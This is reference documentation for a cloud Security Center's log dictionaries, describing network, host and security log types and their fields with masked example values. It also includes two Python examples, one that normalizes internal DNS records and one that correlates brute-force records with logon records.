You can view Security Center logs to identify, investigate, and handle security events at the earliest opportunity. After you purchase log storage capacity, Security Center automatically collects security logs of security events, network logs of network traffic, and host logs of host behavior. This topic describes the types of logs supported by Security Center V1.0 log dictionaries and the fields in each type of log.
Log types supported by different editions
The security capabilities and supported log types vary based on the editions of Security Center. In full protection mode, the available log types are determined by the Security Center edition you purchase. In partial protection mode, where quota management is supported, the log types are based on the Security Center edition bound to the server. The following table outlines the log types supported by different editions:
Editions | Supported log types |
Enterprise Edition and Ultimate Edition | All log types |
Anti-virus Edition and Advanced Edition | All host logs and security logs |
Unbound authorized servers |
|
Log types
Network log types
Network logs are not supported in the Outside China data management center.
Log type | __topic__ | Description | Collection cycle |
sas-log-http | Logs of user requests to web servers and responses from the web servers, including the IP address of the user, request time, request method, request URL, HTTP status code, and response size. Web access logs are used to analyze web traffic and user behavior, identify access patterns and exceptions, and optimize website performance. | In most cases, logs are collected 1 to 12 hours after the logs are generated. | |
sas-log-dns | Logs of DNS resolution details, including the requested domain name, query type, IP address of the client, and response value. You can monitor the request and response process of DNS resolution, and identify abnormal resolution behavior, DNS hijacking, and DNS poisoning based on DNS logs. | ||
local-dns | Logs of DNS queries and responses on the local DNS server, including the requested domain name, query type, IP address of the client, and response value. You can obtain the information about DNS queries in your network, and identify issues such as abnormal query behavior, domain hijacking, and DNS poisoning based on internal DNS logs. | ||
sas-log-session | Logs of network connections and data transmission, including the details of network sessions. The details include the session start time, source IP address, destination IP address, protocol, and ports. Network session logs are generally used to monitor network traffic, identify potential threats, and optimize network performance. |
Host log types
Log type | __topic__ | Description | Collection cycle |
aegis-log-login | Logs of user logons to servers, including the logon time, logon user, logon method, and logon IP address. Logon logs can help you monitor user activities, and identify and respond to abnormal behavior at the earliest opportunity. This helps ensure system security. Note Security Center does not collect the logs of logons to servers that run Windows Server 2008. | Logs are collected in real time. | |
aegis-log-network | Logs of network connections, including the 5-tuples of connections to servers, connection time, and connection status. Network connection logs can help you detect suspicious connections, identify potential network attacks, and optimize network performance. Note
| Logs are collected in real time. | |
aegis-log-process | Logs of server process startups, including the startup time, startup command, and parameters. You can obtain the startup status and configurations of server processes, and identify issues such as abnormal processes, malware intrusion, and threats based on process startup logs. | Logs are collected in real time. When a process starts, the logs are immediately collected. | |
aegis-log-crack | Logs of brute-force attacks, including information about logon attempts, and attempts to crack systems, applications, or accounts. You can obtain the information about brute-force attacks on systems or applications, and identify unusual logon attempts, weak passwords, and credential leaks based on brute-force attack logs. You can also use brute-force attack logs to trace malicious users and collect evidence to assist the security team in incident response and investigation. | Logs are collected in real time. | |
aegis-snapshot-host | Logs of accounts in systems or applications, including the basic information about accounts. The basic information includes the username, password policy, and logon history of an account. You can obtain the changes of accounts and identify potential risks at the earliest opportunity by comparing the account snapshot logs at different points in time. The risks include access from unauthorized accounts and abnormal account status. |
| |
aegis-snapshot-port | Logs of network connections, including the 5-tuples of connections, connection status, and associated processes. You can obtain the information about network sockets in the system, identify abnormal connections and potential network attacks, and optimize network performance based on network snapshot logs. | ||
aegis-snapshot-process | Logs of processes in the system, including the process ID, process name, and process start time. You can obtain the information about processes in the system and resource usage of the processes, and identify issues such as abnormal processes, excessive CPU utilization, and memory leaks based on process snapshot logs. | ||
aegis-log-dns-query | Logs of DNS requests sent by servers, including the requested domain name, query type, and query source. You can obtain the information about DNS queries in the network, and identify issues such as abnormal queries, domain hijacking, and DNS poisoning based on DNS request logs. | Logs are collected in real time. | |
aegis-log-client | Logs of online and offline events of the Security Center agent. | Logs are collected in real time. |
Security log types
Log type | __topic__ | Description | Collection cycle |
sas-vul-log | Logs of vulnerabilities that are detected in the systems or applications, including the vulnerability name, vulnerability status, and handling action. You can obtain the information about the vulnerabilities, security risks, and attack trends in the system, and take proper measures at the earliest opportunity based on vulnerability logs. | Logs are collected in real time. | |
sas-hc-log | Logs of baseline check results, including the baseline severity, baseline type, and risk level. You can obtain the baseline security status and potential risks in the system based on baseline logs. Note The logs record only the data of check items that fail the check the first time and the data of the check items that have passed the previous checks but failed a new check. | ||
sas-security-log | Logs of security events and alerts generated in the system and applications, including the alert data source, alert detail, and alert level. You can obtain the security events and threats in the system and take proper measures at the earliest opportunity based on alert logs. | ||
sas-cspm-log | Logs related to configuration assessment, including the check results of configuration assessment and the operations that add risk items to the whitelist. You can obtain the information about the errors and potential risks in the configurations of cloud services based on configuration assessment logs. | ||
sas-net-block | Logs of network attack events, including key information such as the attack type, source IP address, and destination IP address. You can obtain network security events and implement proper response and defense measures to improve network security and reliability based on network defense logs. | ||
sas-rasp-log | Logs of attacks on applications, including key information such as the attack type, attack pattern, and attacker IP address. You can obtain the information about the security events that occur in applications and implement proper response and defense measures to improve application security and reliability based on application protection logs. | ||
sas-filedetect-log | Logs of malicious file detection, including the file information, detection scenario, and detection result. You can identify common viruses such as ransomware and mining programs in offline files and Object Storage Service (OSS) objects, and handle the viruses at the earliest opportunity to prevent the spread and execution of malicious files based on the logs. |
Network logs
Only Security Center Enterprise and Ultimate support network logs.
Web access logs
Field name | Description | Example |
content_length | The length of the message body. Unit: bytes. | 612 |
dst_ip | The IP address of the destination host. | 39.105.XX.XX |
dst_port | The port of the destination host. | 80 |
host | The IP address or domain name of the destination host. | 39.105.XX.XX |
jump_location | The redirection address. | 123 |
method | The HTTP request method. | GET |
referer | The HTTP referer. The field contains the URL of the web page that is linked to the resource being requested. | www.example.com |
request_datetime | The time when the request is initiated. | 2023-08-07 22:42:41 |
ret_code | The HTTP status code. | 200 |
rqs_content_type | The type of the request content. | text/plain;charset=utf-8 |
rsp_content_type | The type of the response content. | text/plain; charset=utf-8 |
src_ip | The source IP address. | 31.220.XX.XX |
src_port | The source port. | 59524 |
uri | The request URI. | /report |
user_agent | The user agent that initiates the request. | okhttp/3.2.0 |
x_forward_for | The HTTP request header that records the originating IP address of the client. | 31.220.XX.XX |
DNS logs
Field name | Description | Example |
additional | The additional field that is returned by the DNS server and records information such as the CNAME record, MX record, and PTR record. | N/A |
additional_num | The number of additional records returned by the DNS server. | 0 |
answer | The DNS answer returned by the DNS server, which indicates the resolution results. A DNS answer contains the IP address to which the requested domain name is resolved or other information such as the A record and the AAAA record. | example.com A IN 52 1.2.XX.XX |
answer_num | The number of DNS answers. | 1 |
authority | The authority field returned by the DNS server. An authority is the DNS server that manages and resolves the domain name. An authority field contains information about a DNS server that provides the DNS record for the requested domain name, such as the NS record. | NS IN 17597 |
authority_num | The number of authorities. | 1 |
client_subnet | The subnet of the client. | 59.152.XX.XX |
dst_ip | The destination IP address. | 106.55.XX.XX |
dst_port | The destination port. | 53 |
in_out | The direction of data transmission. Valid values:
| out |
qid | The ID of the query. | 13551 |
qname | The domain name that is queried. | example.com |
qtype | The type of the query. | A |
query_datetime | The time of the query. | 2023-08-25 09:59:15 |
rcode | The response code returned by the DNS server, which indicates the DNS resolution result. | 0 |
region | The ID of the source region. Valid values:
| 1 |
response_datetime | The response time of the DNS server. | 2023-08-25 09:59:16 |
src_ip | The source IP address. | 106.11.XX.XX |
src_port | The source port. | 22 |
Internal DNS logs
Field name | Description | Example |
answer_rda | The resource data area (RDA) field of the DNS answer, which indicates the specific value of the resolution result. | 106.11.XX.XX |
answer_ttl | The time to live (TTL) of the DNS answer. Unit: seconds. | 600 |
answer_type | The type of the DNS answer. Valid values:
| 1 |
anwser_name | The name of the DNS answer, which indicates the domain name associated with the resource record. | example.com |
dest_ip | The destination IP address. The value is a decimal IP address by default. | 323223**** |
dest_port | The destination port. | 53 |
group_id | The group ID. The same group ID indicates the same DNS request or response. | 3 |
hostname | The name of the host. | hostname |
id | The ID of the query, which identifies a DNS request or DNS response. | 64588 |
instance_id | The ID of the instance. | i-2zeg4zldn8zypsfg**** |
internet_ip | The public IP address that is included in the DNS request or response. | 121.40.XX.XX |
ip_ttl | The TTL of the IP packet in the DNS request or response. | 64 |
query_name | The domain name that is queried. | example.com |
query_type | The type of the query. Valid values:
| 1 |
src_ip | The IP address from which the DNS request or response is initiated. The value is a decimal IP address by default. | 168427**** |
src_port | The number of the port from which the DNS request or response is initiated. | 53 |
time | The timestamp of the DNS request or response. Unit: seconds. | 1537840756 |
time_usecond | The timestamp of the DNS request or response. Unit: microseconds. | 49069 |
tunnel_id | The ID of the tunnel used by the DNS request or response. Tunneling is a way to transfer data by using different protocols. Tunneling can be used for secure access to the Internet or for communications across different networks. | 514763 |
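The internal DNS fields above store `src_ip` and `dest_ip` as decimal values and split the timestamp across `time` and `time_usecond`, so records need normalizing before they can be correlated with other logs. The following is an added example, not code from Security Center: the function names and sample records are constructed. It assumes that the decimal form is the IPv4 address read as one unsigned 32-bit integer, that `time_usecond` is the sub-second part of `time`, and that `group_id` is scoped to an instance.

```python
import ipaddress
from datetime import datetime, timedelta, timezone

# Fields the table above documents as decimal IP addresses.
DECIMAL_IP_FIELDS = ("src_ip", "dest_ip")


def decimal_to_ipv4(value):
    """Return dotted-quad text for a decimal IPv4 value.

    Assumption: the decimal form is the address as one unsigned 32-bit
    integer. Masked, empty, dotted or out-of-range values pass through.
    """
    text = str(value).strip()
    if not (text.isascii() and text.isdigit()):
        return text
    number = int(text)
    if number > 0xFFFFFFFF:
        return text
    return str(ipaddress.IPv4Address(number))


def event_time(record):
    """Combine `time` (seconds) and `time_usecond` into one UTC datetime.

    Assumption: `time_usecond` holds the sub-second part of the timestamp.
    """
    seconds = int(record["time"])
    micros = int(record.get("time_usecond") or 0)
    base = datetime.fromtimestamp(seconds, tz=timezone.utc)
    return base + timedelta(microseconds=micros)


def normalize_local_dns(record):
    """Return a copy with dotted IP addresses and an ISO 8601 `event_time`."""
    out = dict(record)
    for field in DECIMAL_IP_FIELDS:
        if field in out:
            out[field] = decimal_to_ipv4(out[field])
    out["event_time"] = event_time(record).isoformat(timespec="microseconds")
    return out


def group_lookups(records):
    """Merge records that share a group_id into one summary per lookup.

    Assumption: group_id is only unique per instance, so the key is
    (instance_id, group_id).
    """
    lookups = {}
    normalized = sorted(map(normalize_local_dns, records),
                        key=lambda r: r["event_time"])
    for rec in normalized:
        key = (rec.get("instance_id"), rec.get("group_id"))
        entry = lookups.setdefault(key, {
            "query_name": rec.get("query_name"),
            "first_seen": rec["event_time"],
            "answers": [],
        })
        if rec.get("answer_rda"):
            entry["answers"].append(rec["answer_rda"])
    return lookups


# Constructed sample records (not real log data); values are strings, as
# they would be in an exported log.
SAMPLE_RECORDS = [
    {"instance_id": "i-example0001", "group_id": "3", "id": "64588",
     "query_name": "example.com", "query_type": "1",
     "src_ip": "168427521", "src_port": "40000",
     "dest_ip": "3232235777", "dest_port": "53",
     "time": "1537840756", "time_usecond": "49069"},
    {"instance_id": "i-example0001", "group_id": "3", "id": "64588",
     "query_name": "example.com", "query_type": "1",
     "anwser_name": "example.com", "answer_type": "1",
     "answer_rda": "203.0.113.7", "answer_ttl": "600",
     "src_ip": "3232235777", "src_port": "53",
     "dest_ip": "168427521", "dest_port": "40000",
     "time": "1537840756", "time_usecond": "51200"},
]

if __name__ == "__main__":
    for key, summary in group_lookups(SAMPLE_RECORDS).items():
        print(key, summary)
```
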
Network session logs
Field name | Description | Example |
asset_type | The type of the asset from which the logs are collected. Valid values:
| ECS |
dst_ip | The destination IP address. | 119.96.XX.XX |
dst_port | The destination port. | 443 |
in_out | The direction of the session. The value is fixed as out. | out |
proto | The type of the protocol. Valid values:
| tcp |
session_time | The time when the session starts. | 2023-08-15 09:59:49 |
src_ip | The source IP address. | 121.40.XX.XX |
src_port | The source port. | 53602 |
Host logs
Logon logs
Field name | Description | Example |
instance_id | The ID of the instance. | i-2zeg4zldn8zypsfg**** |
ip | The IP address of the server. | 192.168.XX.XX |
sas_group_name | The asset group to which the server belongs in Security Center. | default |
uuid | The UUID of the server. | 5d83b26b-b7ca-4a0a-9267-12**** |
warn_ip | The IP address that is used to log on to the server. | 221.11.XX.XX |
warn_port | The port that is used to log on to the server. | 22 |
warn_type | The logon type. Valid values:
| SSH |
warn_user | The username that is used for logon. | admin |
warn_count | The number of logon attempts. The repeated logon attempts within 1 minute are recorded in one log. For example, if the value of the | 3 |
Network connection logs
Field name | Description | Example |
cmd_chain | The process chain. | [ { "9883":"bash -c kill -0 -- -'6274'" } ...... ] |
cmd_chain_index | The index of the process chain. You can use an index to search for a process chain. | B184 |
container_hostname | The name of the server in the container. | nginx-ingress-controller-765f67fd4d-**** |
container_id | The container ID. | 4181de1e2b20c3397f1c409266dbd5631d1bc5be7af85246b0d**** |
container_image_id | The image ID. | registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-controller@sha256:5f281994d9e71a1b1a087365271024991c5b0d0543c48f0**** |
container_image_name | The image name. | registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-**** |
container_name | The container name. | nginx-ingress-**** |
container_pid | The ID of the process in the container. | 0 |
dir | The direction of the network connection. Valid values:
| in |
dst_ip | The destination IP address. | 192.168.XX.XX |
dst_port | The destination port. | 443 |
instance_id | The ID of the instance. | i-2zeg4zldn8zypsfg**** |
ip | The IP address of the server. | 192.168.XX.XX |
parent_proc_file_name | The name of the parent process file. | /usr/bin/bash |
pid | The ID of the process. | 14275 |
ppid | The parent process ID. | 14268 |
proc_name | The name of the process. | nginx |
proc_path | The path to the process. | /usr/local/nginx/sbin/nginx |
proc_start_time | The time when the process was started. | N/A |
proto | The protocol. Valid values:
| tcp |
sas_group_name | The asset group to which the server belongs in Security Center. | default |
src_ip | The source IP address. | 100.127.XX.XX |
src_port | The source port. | 41897 |
srv_comm | The command name associated with the parent process of the parent process. | containerd-shim |
status | The status of the network connection. Valid values:
| 5 |
type | The type of the real-time network connection. Valid values:
| listen |
uid | The ID of the user who started the process. | 101 |
username | The name of the user who started the process. | root |
uuid | The UUID of the server. | 5d83b26b-b7ca-4a0a-9267-12**** |
Process startup logs
Field name | Description | Example |
cmd_chain | The process chain. | [ { "9883":"bash -c kill -0 -- -'6274'" } ...... ] |
cmd_chain_index | The index of the process chain. You can use an index to search for a process chain. | B184 |
cmd_index | The index of a parameter in the command line. Every two indexes are grouped to identify the start of a parameter and the end of the parameter. | 0,3,5,8 |
cmdline | The complete command to start the process. | ipset list KUBE-6-CLUSTER-IP |
comm | The command name related to the process. | N/A |
container_hostname | The name of the server in the container. | nginx-ingress-controller-765f67fd4d-**** |
container_id | The container ID. | 4181de1e2b20c3397f1c409266dbd5631d1bc5be7af85246b0d**** |
container_image_id | The image ID. | registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-controller@sha256:5f281994d9e71a1b1a087365271024991c5b0d0543c48f0**** |
container_image_name | The image name. | registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-**** |
container_name | The container name. | nginx-ingress-**** |
containerpid | The ID of the process in the container. | 0 |
cwd | The current working directory (CWD) of the process. | N/A |
filename | The name of the process file. | ipset |
filepath | The full path to the process file. | /usr/sbin/ipset |
gid | The ID of the process group. | 0 |
groupname | The name of the user group. | group1 |
instance_id | The ID of the instance. | i-2zeg4zldn8zypsfg**** |
ip | The IP address of the server. | 192.168.XX.XX |
parent_cmd_line | The command line of the parent process. | /usr/local/bin/kube-proxy --config=/var/lib/kube-proxy/config.conf --hostname-override=cn-beijing.192.168.XX.XX |
pfilename | The name of the parent process file. | kube-proxy |
pfilepath | The full path to the parent process file. | /usr/local/bin/kube-proxy |
pid | The ID of the process. | 14275 |
ppid | The parent process ID. | 14268 |
pstime | The time when the parent process was started. | 2023-08-09 14:19:00 |
sas_group_name | The asset group to which the server belongs in Security Center. | default |
srv_cmd | The command line of the ancestor process. | /usr/bin/containerd |
tty | The terminal that is logged on to. The value N/A indicates that the account has not been used for terminal logons. | N/A |
uid | The user ID. | 123 |
uid | The ID of the user who started the process. | 101 |
username | The name of the user who started the process. | root |
uuid | The UUID of the server. | 5d83b26b-b7ca-4a0a-9267-12**** |
Brute-force attack logs
Field name | Description | Example |
instance_id | The ID of the instance. | i-2zeg4zldn8zypsfg**** |
ip | The IP address of the server that is under a brute-force attack. | 192.168.XX.XX |
sas_group_name | The asset group to which the server belongs in Security Center. | default |
uuid | The UUID of the server that is under a brute-force attack. | 5d83b26b-b7ca-4a0a-9267-12***** |
warn_count | The number of failed logon attempts. The repeated logon attempts within 1 minute are recorded in one log. For example, if the value of the | 3 |
warn_ip | The source IP address. | 47.92.XX.XX |
warn_port | The logon port. | 22 |
warn_type | The logon type. Valid values:
| SSH |
warn_user | The username that is used for logon. | user |
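Because one brute-force record can cover up to a minute of attempts, failures have to be totalled from `warn_count` rather than by counting records. The following added example (not Security Center code) does that per server and source IP, then flags logon-log records from a source that had already accumulated many failures on the same server. The function names, the `min_failed` threshold and the sample records are constructed; it assumes a record in the logon logs represents a completed logon, and it does not check ordering because the field tables above list no timestamp.

```python
from collections import defaultdict


def _count(value):
    """warn_count arrives as text in exported logs; fall back to 1."""
    try:
        return max(int(value), 1)
    except (TypeError, ValueError):
        return 1


def summarize_failures(crack_logs):
    """Total failed attempts per (server uuid, source IP).

    Each brute-force record aggregates the attempts seen within one
    minute, so warn_count is summed instead of counting records.
    """
    summary = defaultdict(lambda: {"failed": 0, "users": set()})
    for rec in crack_logs:
        entry = summary[(rec["uuid"], rec["warn_ip"])]
        entry["failed"] += _count(rec.get("warn_count"))
        entry["users"].add(rec.get("warn_user"))
    return summary


def logons_after_guessing(crack_logs, login_logs, min_failed=10):
    """Return logon records whose source IP also failed at least
    min_failed times against the same server (hypothetical threshold)."""
    failures = summarize_failures(crack_logs)
    hits = []
    for rec in login_logs:
        stats = failures.get((rec["uuid"], rec["warn_ip"]))
        if stats is None or stats["failed"] < min_failed:
            continue
        hits.append({
            "uuid": rec["uuid"],
            "warn_ip": rec["warn_ip"],
            "warn_type": rec.get("warn_type"),
            "logon_user": rec.get("warn_user"),
            "failed_attempts": stats["failed"],
            "users_tried": sorted(u for u in stats["users"] if u),
            # True when the account that logged on was among those guessed.
            "user_was_targeted": rec.get("warn_user") in stats["users"],
        })
    return hits


# Constructed sample records (documentation IP ranges, placeholder UUIDs).
CRACK_LOGS = [
    {"uuid": "srv-1", "ip": "192.0.2.10", "warn_ip": "203.0.113.5",
     "warn_port": "22", "warn_type": "SSH", "warn_user": "root",
     "warn_count": "8"},
    {"uuid": "srv-1", "ip": "192.0.2.10", "warn_ip": "203.0.113.5",
     "warn_port": "22", "warn_type": "SSH", "warn_user": "admin",
     "warn_count": "7"},
    {"uuid": "srv-1", "ip": "192.0.2.10", "warn_ip": "198.51.100.9",
     "warn_port": "22", "warn_type": "SSH", "warn_user": "user",
     "warn_count": "3"},
]
LOGIN_LOGS = [
    {"uuid": "srv-1", "ip": "192.0.2.10", "warn_ip": "203.0.113.5",
     "warn_port": "22", "warn_type": "SSH", "warn_user": "admin",
     "warn_count": "1"},
    {"uuid": "srv-1", "ip": "192.0.2.10", "warn_ip": "198.51.100.9",
     "warn_port": "22", "warn_type": "SSH", "warn_user": "user",
     "warn_count": "1"},
    {"uuid": "srv-2", "ip": "192.0.2.11", "warn_ip": "203.0.113.5",
     "warn_port": "22", "warn_type": "SSH", "warn_user": "admin",
     "warn_count": "1"},
]

if __name__ == "__main__":
    for hit in logons_after_guessing(CRACK_LOGS, LOGIN_LOGS):
        print(hit)
```
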
Account snapshot logs
Field name | Description | Example |
account_expire | The date when the account expires. The value never indicates that the account never expires. | never |
domain | The domain or directory to which the account belongs. The value N/A indicates that the account does not belong to a domain. | N/A |
groups | The group to which the account belongs. The value N/A indicates that the account does not belong to a group. | ["nscd"] |
home_dir | The home directory, which is the default directory to store and manage files in the system. | /Users/abc |
instance_id | The ID of the instance. | i-2zeg4zldn8zypsfg**** |
ip | The IP address of the server. | 192.168.XX.XX |
last_chg | The date when the password was last changed. | 2022-11-29 |
last_logon | The date and time of the last logon that is initiated by using the account. The value N/A indicates that the account has not been used for logons. | 2023-08-18 09:21:21 |
login_ip | The IP address from which the last remote logon was initiated by using the account. The value N/A indicates that the account has not been used for logons. | 192.168.XX.XX |
passwd_expire | The date when the password expires. The value never indicates that the password never expires. | 2024-08-24 |
perm | Indicates whether the account has root permissions. Valid values:
| 0 |
sas_group_name | The asset group to which the server belongs in Security Center. | default |
shell | The Linux shell command. | /sbin/nologin |
status | The status of the account. Valid values:
| 0 |
tty | The terminal that is logged on to. The value N/A indicates that the account has not been used for terminal logons. | N/A |
user | The name of the user. | nscd |
uuid | The UUID of the server. | 5d83b26b-b7ca-4a0a-9267-12**** |
warn_time | The date when you are notified of expiring passwords. The value never indicates that no notifications are sent. | 2024-08-20 |
Network snapshot logs
Field name | Description | Example |
dir | The direction of the network connection. Valid values:
| in |
dst_ip | The destination IP address.
| 192.168.XX.XX |
dst_port | The destination port. | 443 |
instance_id | The ID of the instance. | i-2zeg4zldn8zypsfg**** |
ip | The IP address of the server. | 192.168.XX.XX |
pid | The ID of the process. | 682 |
proc_name | The name of the process. | sshd |
proto | The protocol. Valid values:
| tcp4 |
sas_group_name | The asset group to which the server belongs in Security Center. | default |
src_ip | The source IP address. | 100.127.XX.XX |
src_port | The source port. | 41897 |
status | The status of the network connection. Valid values:
| 5 |
uuid | The UUID of the server. | 5d83b26b-b7ca-4a0a-9267-12**** |
Process snapshot logs
Field name | Description | Example |
cmdline | The complete command to start the process. | /usr/local/share/assist-daemon/assist_daemon |
instance_id | The ID of the instance. | i-2zeg4zldn8zypsfg**** |
ip | The IP address of the server. | 192.168.XX.XX |
md5 | The MD5 hash value of the binary file. Note The MD5 algorithm is not supported for files that exceed 1 MB in size. | 1086e731640751c9802c19a7f53a64f5 |
name | The name of the process file. | assist_daemon |
path | The full path to the process file. | /usr/local/share/assist-daemon/assist_daemon |
pid | The ID of the process. | 1692 |
pname | The name of the parent process file. | systemd |
sas_group_name | The asset group to which the server belongs in Security Center. | default |
start_time | The time when the process started. This is a built-in field. | 2023-08-18 20:00:12 |
uid | The ID of the user who started the process. | 101 |
username | The name of the user who started the process. | root |
uuid | The UUID of the server. | 5d83b26b-b7ca-4a0a-9267-12**** |
DNS request logs
Field name | Description | Example |
domain | The domain name that is included in the DNS request. | example.aliyundoc.com |
instance_id | The ID of the instance. | i-2zeg4zldn8zypsfg**** |
ip | The IP address of the server that initiates the DNS request. | 192.168.XX.XX |
pid | The ID of the process that initiates the DNS request. | 3544 |
ppid | The ID of the parent process that initiates the DNS request. | 3408 |
proc_cmd_chain | The chain of the process that initiates the DNS request. | "3544":"\"C:\\Program Files (x86)\\Alibaba\\Aegis\\AliDetect\\AliDetect.exe\"" |
proc_cmdline | The command line of the process that initiates the DNS request. | C:\Program Files (x86)\Alibaba\Aegis\AliDetect\AliDetect.exe |
proc_path | The path to the process that initiates the DNS request. | C:/Program Files (x86)/Alibaba/Aegis/AliDetect/AliDetect.exe |
sas_group_name | The asset group to which the server belongs in Security Center. | default |
time | The time when the DNS request is captured. In most cases, the value is the point in time when the DNS request is initiated. | 2023-08-17 20:05:04 |
uuid | The UUID of the server that initiates the DNS request. | 5d83b26b-b7ca-4a0a-9267-12**** |
Agent event logs
Field name | Description | Example |
uuid | The UUID of the server. | 5d83b26b-b7ca-4a0a-9267-12**** |
client_ip | The IP address of the server. | 192.168.XX.XX |
agent_version | The version of the Security Center agent. | aegis_11_91 |
last_login | The timestamp of the last logon. Unit: milliseconds. | 1716444387617 |
platform | The type of the operating system. Valid values:
| linux |
region_id | The ID of the region in which the server resides. | cn-beijing |
status | The status of the Security Center agent. Valid values:
| online |
Security logs
Vulnerability logs
Field name | Description | Example |
alias_name | The alias of the vulnerability. | CESA-2023:1335: openssl Security Update |
extend_content | The extended information about the vulnerability. | {"cveList":["CVE-2023-0286"],"necessity":{"gmt_create":"20230816","connect_cnt":80,"total_score":0.0,"assets_factor":1.0,"enviroment_factor":1.5,"status":"normal"},"os":"centos","osRelease":"7","preCheck":{},"rpmCanUpdate":true,"rpmEntityList":[{"fullVersion":"1.0.2k-25.el7_9","kernel":false,"matchDetail":"openssl-libs version less than 1.0.2k-26.el7_9","matchList":["openssl-libs version less than 1.0.2k-26.el7_9"],"name":"openssl-libs","nextResult":false,"path":"/etc/pki/tls","result":true,"updateCmd":"yum update openssl-libs","version":"1.0.2k-25.el7_9"},{"fullVersion":"1.0.2k-25.el7_9","kernel":false,"matchDetail":"openssl version less than 1.0.2k-26.el7_9","matchList":["openssl version less than 1.0.2k-26.el7_9"],"name":"openssl","nextResult":false,"path":"/etc/pki/CA","result":true,"updateCmd":"yum update openssl","version":"1.0.2k-25.el7_9"}]} |
instance_id | The ID of the instance. | i-2zeg4zldn8zypsfg**** |
internet_ip | The public IP address of the host. | 39.104.XX.XX |
intranet_ip | The private IP address of the host. | 192.168.XX.XX |
machine_name | The name of the host. | hhht-linux-*** |
name | The name of the vulnerability. | centos:7:cesa-2023:1335 |
op | The operation on the vulnerability. Valid values:
| new |
status | The status information. Valid values:
| 1 |
tag | The tag that is added to the vulnerability. Valid values:
| oval |
type | The type of the vulnerability. Valid values:
| sys |
uuid | The UUID of the server. | ad66133a-dc82-4e5e-9659-a49e3**** |
Baseline logs
Field name | Description | Example |
check_item | The name of the check item. | Set the shortest interval between password changes |
check_level | The risk level of the baseline. Valid values:
| medium |
check_type | The type of the check item. | Identity authentication |
instance_id | The ID of the instance. | i-2zeg4zldn8zypsfg**** |
level | The severity of the risk item. Valid values:
| medium |
op | The operation. Valid values:
| new |
risk_name | The name of the risk item. | Password compliance check |
sas_group_name | The server group to which the server belongs in Security Center. The risk item is detected on the server. | default |
status | The status information. Valid values:
| 1 |
sub_type_alias | The alias of the subtype in Chinese. | Internationally Agreed Best Practices for Security - Ubuntu 16/18/20/22 Security Baseline Check |
sub_type_name | The name of the subtype. For more information about baseline subtypes, see Baseline types and subtypes. | hc_ubuntu16_cis_rules |
type_alias | The alias of the check type in Chinese. | Internationally Agreed Best Practices for Security |
type_name | The type of the baseline. For more information about baseline types, see Baseline types and subtypes. | cis |
uuid | The UUID of the server on which the risk item is detected. | 1ad66133a-dc82-4e5e-9659-a49e3**** |
Alert logs
Field name | Description | Example |
data_source | The data source. Valid values:
| aegis_login_log |
detail | The details of the alert. Note The value of the detail field in the log varies based on the alert type. If you have questions about the parameters in the detail field when you view alert logs, you can submit a ticket to contact technical support. | {"loginSourceIp":"221.11.XX.XX","loginDestinationPort":22,"loginUser":"root","protocol":2,"protocolName":"SSH","clientIp":"192.168.XX.XX","loginTimes":1,"location":"Xi'an","type":"login_common_account","displayEventName":"Log on to an ECS instance by using an unusual account","status":0} |
instance_id | The ID of the instance. | i-2zeg4zldn8zypsfg**** |
internet_ip | The public IP address of the host. | 39.104.XX.XX |
intranet_ip | The private IP address of the host. | 192.168.XX.XX |
level | The risk level of the alert. Valid values:
| suspicious |
name | The name of the alert. | Unusual logon - Logon to an ECS instance by using an unusual account |
op | The operation. Valid values:
| new |
status | The status of the alert. Valid values:
| 1 |
unique_info | The UUID of the alert. | 2536dd765f804916a1fa3b9516b5**** |
uuid | The UUID of the server on which the alert is generated. | ad66133a-dc82-4e5e-9659-a49e3**** |
Configuration assessment logs
Field name | Description | Example |
check_id | The ID of the check item. You can call the ListCheckResult operation to query the IDs of check items. The operation is used to query the details of the risk items that are detected in the configuration checks on cloud services. | 11 |
check_show_name | The name of the check item. | Back-to-origin settings |
instance_id | The ID of the instance. | i-2zeg4zldn8zypsfg**** |
instance_name | The name of the instance. | lsm |
instance_result | The impacts of risks. The value is a JSON string. | {"Checks":[{}],"Columns":[{"key":"RegionIdShow","search":true,"searchKey":"RegionIdKey","showName":"Region","type":"text"},{"key":"InstanceIdShow","search":true,"searchKey":"InstanceIdKey","showName":"Instance ID","type":"link"},{"key":"InstanceNameShow","search":true,"searchKey":"InstanceNameKey","showName":"Instance Name","type":"text"}]} |
instance_sub_type | The subtype of the instance. Valid values:
| INSTANCE |
instance_type | The type of the instance. Valid values:
| ECS |
region_id | The region ID of the instance. | cn-hangzhou |
requirement_id | The requirement item ID. You can call the ListCheckStandard operation to query the IDs of requirement items. The operation is used to query the standards of configuration checks. | 5 |
risk_level | The risk level. Valid values:
| MEDIUM |
section_id | The section ID. You can call the ListCheckResult operation to query section IDs. The operation is used to query the details of the risk items that are detected in the configuration checks on cloud services. | 1 |
standard_id | The standard ID. You can call the ListCheckStandard operation to query standard IDs. The operation is used to query the standards of configuration checks. | 1 |
status | The status of the check item. Valid values:
| PASS |
vendor | The cloud service provider. The value is fixed as ALIYUN. | ALIYUN |
Network defense logs
Field name | Description | Example |
cmd | The command line of the attacked process. | nginx: master process nginx |
cur_time | The time when the attack event occurred. | 2023-09-14 09:21:59 |
decode_payload | The decoded hexadecimal payload. | POST /Services/FileService/UserFiles/ |
dest_ip | The IP address of the attacked asset. | 172.16.XX.XX |
dest_port | The port of the attacked asset. | 80 |
func | The type of the blocked event. Valid values:
| payload |
rule_type | The type of the rule that is used in the blocked event. Valid values:
| alinet_payload |
instance_id | The instance ID of the attacked asset. | i-2zeg4zldn8zypsfg**** |
internet_ip | The public IP address of the attacked asset. | 39.104.XX.XX |
intranet_ip | The private IP address of the attacked asset. | 192.168.XX.XX |
model | The defense action. The value is fixed as block, which indicates that the attack is blocked. | block |
payload | The hexadecimal payload. | 504f5354202f20485454502f312e310d0a436f6e74656e742d547970653a20746578742f706c61696e0d0a557365722d4167656e743a20**** |
pid | The ID of the attacked process. | 7107 |
platform | The type of the operating system of the attacked asset. Valid values:
| linux |
proc_path | The path to the attacked process. | /usr/sbin/nginx |
sas_group_name | The asset group to which the server belongs in Security Center. | default |
src_ip | The source IP address of the attack. | 106.11.XX.XX |
src_port | The source port of the attack. | 29575 |
uuid | The UUID of the server. | 5d83b26b-b7ca-4a0a-9267-12**** |
